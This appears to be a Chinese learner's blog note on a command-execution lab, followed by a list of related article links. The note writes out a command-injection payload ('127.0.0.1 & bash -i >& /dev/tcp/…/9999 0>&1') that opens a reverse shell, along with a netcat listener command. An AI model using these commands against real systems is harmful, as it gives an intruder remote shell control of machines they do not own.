当前位置: 首页 > news >正文

命令执行简单

前言:小迪安全2022第一节反弹shell,小迪用的是两台都是云服务器,没有服务器可以在自己的主机上搭建也是可以的,主机上搭两个网站

思路:生成一个木马文件,下载到本机,然后利用本机上传到目标主机,执行反弹命令。

但是现在这个可以用bash反弹,在centos里面

正题:

在棱角社区,找到反弹shell

这个是写在被攻击机上的,写了这个就会将目标的控制台,返回到以下
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1(错误)

127.0.0.1 & bash -i >& /dev/tcp/192.168.1.150/9999 0>&1(正确)

然后在攻击机上监听上这个端口,监听本地端口的8080

nc64.exe -lvvp 9999                //注意加地址好像会监听失败

做的过程中的问题

在本地监听9999端口,然后在被攻击机上发送对方的控制台给我的本机,

但是结果失败了。

127.0.0.1 & bash -i >& /dev/tcp/192.168.1.150/9999 0>&1(正确)

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1(错误)(棱角社区有毒)

http://www.lryc.cn/news/487852.html

相关文章:

  • 【一句话经验】亚马逊云EC2 ubuntu24.04.1开启ROOT登录Permission denied (publickey)
  • 百度智能云千帆大模型平台引领企业创新增长
  • 【Linux】深入理解GCC/G++编译流程及库文件管理
  • 【Unity基础】对比Unity中两种粒子系统
  • 琐碎笔记——pytest实现前置、后置、参数化、跳过用例执行以及重试
  • C# 深层副本与浅层副本 深拷贝与浅拷贝
  • CH06_Lambda表达式
  • 大模型本地部署实践:Ollama+Open-WebUI(MacOS)
  • JavaScript——DOM编程、JS的对象和JSON
  • SIMCom芯讯通A7680C在线升级:FTP升级成功;http升级腾讯云对象储存的文件失败;http升级私有服务器的文件成功
  • OSRM docker环境启动
  • Vue3 动态获取 assets 文件夹图片
  • <项目代码>YOLOv8 草莓成熟识别<目标检测>
  • 代码随想录算法训练营第五十一天|Day51 图论
  • uniapp 自定义加载组件,全屏加载,局部加载 (微信小程序)
  • STM32完全学习——系统时钟设置
  • Github 2024-11-16Rust开源项目日报 Top10
  • CH03_反射
  • vue2侧边导航栏路由
  • core 不可变类型 线程安全 record
  • linux之调度管理(8)-SMP cpu 的 psci启动
  • review-消息中间件MQ
  • leetcode400第N位数字
  • 前端网页开发学习(HTML+CSS+JS)有这一篇就够!
  • CSS遮罩:mask
  • Swift闭包的本质
  • 时代变迁对传统机器人等方向课程的巨大撕裂
  • 【算法设计与分析实训】第1关:求序列的最大字段和
  • 【澜舟科技-注册/登录安全分析报告】
  • 【读书笔记-《网络是怎样连接的》- 7】Chapter3_2 路由器